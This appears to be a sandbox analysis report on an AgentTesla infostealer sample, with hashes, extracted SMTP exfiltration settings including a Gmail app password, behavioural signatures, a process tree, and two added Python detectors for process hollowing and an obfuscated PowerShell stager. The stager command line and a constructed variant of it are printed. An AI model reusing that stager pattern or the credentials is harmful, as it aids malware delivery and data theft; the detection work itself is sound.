Analysis
- max time kernel: 142s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-06-2024 18:31

Static task: static1
Behavioral task: behavioral1
- Sample: INV.exe
- Resource: win7-20240221-en
General
- Target: INV.exe
- Size: 629KB
- MD5: 7c37ca93ea31895ae8c37b5086aafb5f
- SHA1: 36ec354b8f559c44ac1a45d9bbe56ee8dbf883db
- SHA256: edd8ae87a81a2627e70d3df6bbe1a7185c8045bc4ef9624c5f2b8487d86dbd73
- SHA512: 852e0315d1930b9dcb85c7d649c2e0524eaee1ed287d21be6dbb37a27151e200236237b9d9490bc3453bf01ac2baf1e695c83e88484fd5a426482772d52fe864
- SSDEEP: 12288:mgS5y5R7+SyRps33QjMEVyhxLBDulZ7+OibPNL5lNXKVLbziXMOvrxdRnh457ks3:65yH73QbyLlDu3C/lNXKL3i9v3Idke
Malware Config

Extracted
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: vjru ncjq zilj zxwk

Extracted (agenttesla)
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: vjru ncjq zilj zxwk
- Email To: [email protected]
Signatures

AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and information stealer.

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell with the display window hidden.

Loads dropped DLL (1 IoC)
Processes:
- PID 4112 Fugninger.exe

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
- flow 23: api.ipify.org
- flow 24: api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
Processes:
- PID 4112 Fugninger.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
- PID 2120 powershell.exe
- PID 4112 Fugninger.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
- PID 2120 powershell.exe set thread context of PID 4112 Fugninger.exe

Drops file in Program Files directory (2 IoCs)
Files:
- File opened for modification: C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini (by INV.exe)
- File opened for modification: C:\Program Files (x86)\Common Files\boltholes.obl (by INV.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (11 IoCs)
Processes:
- PID 2120 powershell.exe (9 events)
- PID 4112 Fugninger.exe (2 events)

Suspicious behavior: MapViewOfSection (1 IoC)
Processes:
- PID 2120 powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
- Token: SeDebugPrivilege, PID 2120 powershell.exe
- Token: SeDebugPrivilege, PID 4112 Fugninger.exe

Suspicious use of WriteProcessMemory (11 IoCs)
Processes:
- PID 624 INV.exe wrote to memory of PID 2120 powershell.exe (3 events)
- PID 2120 powershell.exe wrote to memory of PID 2164 cmd.exe (3 events)
- PID 2120 powershell.exe wrote to memory of PID 4112 Fugninger.exe (5 events)
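Read together, the WriteProcessMemory and SetThreadContext signatures show powershell.exe (PID 2120) writing into Fugninger.exe (PID 4112) five times and then setting a thread context in it, while its three writes into cmd.exe (PID 2164) and INV.exe's three writes into powershell.exe come with no thread-context change. The Python below is an added example, not part of the sandbox report, that correlates those two signature tables into a per-target summary and flags only the source/target pair that shows both behaviours. The event list is transcribed from the tables above (same PIDs, images and repeat counts) and the parent/child relations from the Processes tree; no other data is assumed.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ApiEvent:
    api: str        # signature name as the sandbox reports it
    src_pid: int    # process making the call
    src_image: str
    dst_pid: int    # process being written to / whose thread is modified
    dst_image: str


@dataclass(frozen=True)
class Process:
    pid: int
    ppid: Optional[int]
    image: str


# Transcribed from the WriteProcessMemory and SetThreadContext tables above:
# same PIDs, images and repeat counts as the report lists them.
EVENTS: List[ApiEvent] = (
    [ApiEvent("WriteProcessMemory", 624, "INV.exe", 2120, "powershell.exe")] * 3
    + [ApiEvent("WriteProcessMemory", 2120, "powershell.exe", 2164, "cmd.exe")] * 3
    + [ApiEvent("WriteProcessMemory", 2120, "powershell.exe", 4112, "Fugninger.exe")] * 5
    + [ApiEvent("SetThreadContext", 2120, "powershell.exe", 4112, "Fugninger.exe")]
)

# Parent/child relations as shown in the Processes tree of the report.
PROCESSES: List[Process] = [
    Process(624, None, "INV.exe"),
    Process(2120, 624, "powershell.exe"),
    Process(2164, 2120, "cmd.exe"),
    Process(4112, 2120, "Fugninger.exe"),
]


def summarize_targets(events: List[ApiEvent]) -> Dict[Tuple[int, int], dict]:
    """Per (source pid, target pid): number of memory writes, whether a thread
    context was set, and the target image name."""
    out: Dict[Tuple[int, int], dict] = {}
    for e in events:
        rec = out.setdefault((e.src_pid, e.dst_pid),
                             {"writes": 0, "ctx": False, "image": e.dst_image})
        if e.api == "WriteProcessMemory":
            rec["writes"] += 1
        elif e.api == "SetThreadContext":
            rec["ctx"] = True
    return out


def flag_injection(events: List[ApiEvent], min_writes: int = 1) -> List[Tuple[int, int, str]]:
    """Flag (src, dst, dst_image) where the source both wrote into the target and
    rewrote one of its thread contexts, i.e. pointed a thread at bytes it placed
    there. Writes alone are not flagged: the report shows the same three-write
    pattern for the ordinary launches 624 -> 2120 and 2120 -> 2164, so writes by
    themselves separate nothing here. CREATE_SUSPENDED and ResumeThread, which
    complete the textbook hollowing sequence, are not among the events the report
    records, so the rule keys only on the two APIs it does list."""
    return sorted(
        (src, dst, rec["image"])
        for (src, dst), rec in summarize_targets(events).items()
        if rec["ctx"] and rec["writes"] >= min_writes
    )


def render_tree(processes: List[Process], flagged: List[Tuple[int, int, str]]) -> List[str]:
    """Indented process tree with the injected-into process marked."""
    children: Dict[Optional[int], List[Process]] = defaultdict(list)
    for p in processes:
        children[p.ppid].append(p)
    marked = {dst for _, dst, _ in flagged}
    lines: List[str] = []

    def walk(ppid: Optional[int], depth: int) -> None:
        for p in children[ppid]:
            tag = "  <-- written to + thread context set by parent" if p.pid in marked else ""
            lines.append(f"{'    ' * depth}{p.image} (PID {p.pid}){tag}")
            walk(p.pid, depth + 1)

    walk(None, 0)
    return lines


if __name__ == "__main__":
    hits = flag_injection(EVENTS)
    print("\n".join(render_tree(PROCESSES, hits)))
    for src, dst, image in hits:
        print(f"probable process hollowing: PID {src} -> PID {dst} ({image})")
```

Run stand-alone, the tree prints with Fugninger.exe (PID 4112) marked and a single line naming 2120 -> 4112 as the hollowing pair; cmd.exe (PID 2164) is not flagged even though it was written to three times, which is the point of requiring both behaviours.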
Processes

1. C:\Users\Admin\AppData\Local\Temp\INV.exe (PID 624)
   Command line: "C:\Users\Admin\AppData\Local\Temp\INV.exe"
   - Drops file in Program Files directory
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2120, child of 624)
      Command line: "powershell.exe" -windowstyle hidden "$Fleapit=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Demulsification\Legitimistisk.Rac';$Replevy=$Fleapit.SubString(51921,3);.$Replevy($Fleapit)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\cmd.exe (PID 2164, child of 2120)
         Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

      3. C:\Users\Admin\AppData\Local\Temp\Fugninger.exe (PID 4112, child of 2120)
         Command line: "C:\Users\Admin\AppData\Local\Temp\Fugninger.exe"
         - Loads dropped DLL
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
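The PowerShell command line recorded for PID 2120 reads the dropped file Legitimistisk.Rac into $Fleapit, takes the three characters at offset 51921 of that content as $Replevy, and dot-invokes that three-character string as a command with the whole file content as its argument. The command name is therefore stored inside the payload file and never appears on the command line, which defeats naive keyword matching. The Python below is an added example, not part of the sandbox report, that pulls this read -> slice -> invoke shape out of a process command line and extracts the path, offset and length for triage. The observed command line is the one from the tree above; the variant (gc alias, short -w h switch, & call operator) and the two benign lines are constructed for the example, and the drive paths in them are hypothetical. gc, cat and type are built-in aliases of Get-Content, and both the dot-source operator and & will run a command whose name is held in a string variable.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Command line recorded for PID 2120 in the process tree above (from the report).
OBSERVED = (
    r'"powershell.exe" -windowstyle hidden "$Fleapit=Get-Content '
    r"'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Demulsification\Legitimistisk.Rac';"
    r'$Replevy=$Fleapit.SubString(51921,3);.$Replevy($Fleapit)"'
)

# Constructed for this example (not from the report): the same shape written with
# the gc alias, the short -w h switch and the & call operator, plus two benign
# lines that share tokens with it. Paths are hypothetical.
VARIANT = (
    r'powershell -w h "$a=gc '
    r"'C:\Users\Public\stage.dat';"
    r'$b=$a.SubString(1024,3);&$b($a)"'
)
BENIGN = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r'"powershell.exe" -windowstyle hidden "Get-Content ' + r"'C:\logs\app.log'" + r' | Select-Object -Last 5"',
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
# $var = Get-Content 'path'   (gc, cat and type are built-in aliases of Get-Content)
READ = re.compile(r"\$(\w+)\s*=\s*(?:Get-Content|gc|cat|type)\s+'([^']+)'", re.I)
# $verb = $content.SubString(offset, length)
SLICE = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
# .$verb($content)  or  &$verb($content): run the sliced string as a command
INVOKE = re.compile(r"[.&]\s*\$(\w+)\s*\(\s*\$(\w+)\s*\)")


@dataclass(frozen=True)
class StagerFinding:
    payload_path: str   # file the verb is cut from and then fed back into that verb
    offset: int
    length: int
    content_var: str
    verb_var: str
    hidden_window: bool


def detect_stager(cmdline: str) -> Optional[StagerFinding]:
    """Match the read -> slice -> invoke chain and make sure the variables close
    the loop: the slice comes from the file content, the slice is what gets
    invoked, and the file content is its argument. Variable names are compared
    case-insensitively because PowerShell treats them that way."""
    read, sl, inv = READ.search(cmdline), SLICE.search(cmdline), INVOKE.search(cmdline)
    if not (read and sl and inv):
        return None
    content_var, path = read.group(1).lower(), read.group(2)
    verb_var, slice_src = sl.group(1).lower(), sl.group(2).lower()
    if slice_src != content_var:
        return None
    if inv.group(1).lower() != verb_var or inv.group(2).lower() != content_var:
        return None
    return StagerFinding(path, int(sl.group(3)), int(sl.group(4)),
                         content_var, verb_var, bool(HIDDEN.search(cmdline)))


def scan(cmdlines: List[str]) -> List[Tuple[str, StagerFinding]]:
    """Apply the check to a batch of process-creation command lines."""
    hits = []
    for c in cmdlines:
        f = detect_stager(c)
        if f:
            hits.append((c, f))
    return hits


if __name__ == "__main__":
    for cmd, f in scan([OBSERVED, VARIANT] + BENIGN):
        print(f"stager: reads {f.payload_path}, verb = {f.length} chars at offset {f.offset}, "
              f"hidden window = {f.hidden_window}")
```

The offset and length are the useful output for an analyst with the dropped file in hand: the bytes at that position are the command the stager runs, and the rest of the file is what it runs them on. The check deliberately requires the variable chain to close rather than keying on any single token, since a hidden window or a Get-Content call on its own is common in legitimate administration.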
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 50KB
  MD5: e7abb67ce4fba756d35ab5e6dccc3e88
  SHA1: 4bc08748d926a51c7a6f0fa60a87579f130829e1
  SHA256: 6063bd1c9f0bf59ce14856996908cc8eaba317bdedf2da271da223a09040a1bd
  SHA512: c7c86ad5838ef6e861d06b987a5e1b5dc38fd399ee1b42bec8e5b6a60e473d18449e5baa5264503660eead4b53a439f6142c7e2e30639d2457fde9e8c2ea227b

- Filesize: 311KB
  MD5: 015664a0e6110b59cd0f52fa4aea9e9a
  SHA1: 01bb36fa054704ec6fec55856a93498127ab30d0
  SHA256: 7d950d49a8c2526bed81c4357ed6b6998030a3a3adfa27c29e3b0281a28ed7c7
  SHA512: a37a7efe9863da2e44a984a6afc1b15e3eac95ca734bcebf68b4d453dd685a7735e0a0a1b837f641b1f1c0ba0da2002e39427ff4960f863cdec2fc3c3787a63d

- Filesize: 629KB (the submitted sample itself; hashes match the General section)
  MD5: 7c37ca93ea31895ae8c37b5086aafb5f
  SHA1: 36ec354b8f559c44ac1a45d9bbe56ee8dbf883db
  SHA256: edd8ae87a81a2627e70d3df6bbe1a7185c8045bc4ef9624c5f2b8487d86dbd73
  SHA512: 852e0315d1930b9dcb85c7d649c2e0524eaee1ed287d21be6dbb37a27151e200236237b9d9490bc3453bf01ac2baf1e695c83e88484fd5a426482772d52fe864

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82